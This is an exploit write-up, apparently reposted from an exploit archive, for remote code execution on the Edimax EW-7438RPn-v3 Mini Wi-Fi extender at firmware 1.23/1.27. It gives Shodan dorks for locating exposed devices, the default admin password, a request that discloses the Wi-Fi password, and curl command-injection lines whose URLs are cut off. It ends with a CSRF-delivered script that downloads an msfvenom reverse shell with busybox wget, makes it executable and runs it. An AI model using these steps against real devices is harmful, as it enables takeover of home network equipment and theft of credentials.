Published on April 15th, 2020 📆 | 2069 Views ⚑
0Edimax Technology EW-7438RPn-v3 Mini 1.27 Remote Code Execution ↭
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip
== Shodan Dorks ==
(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"
== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==
GET /wizard_reboot.asp
showSSID = "
document.write(''+"
== Command Execution * ==
(Setup Mode)
curl 'http://
(Unsetup Mode with default password)
curl 'http://
== Cross-Site Request Forgery -> Command Execution * ==
* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------
Gloss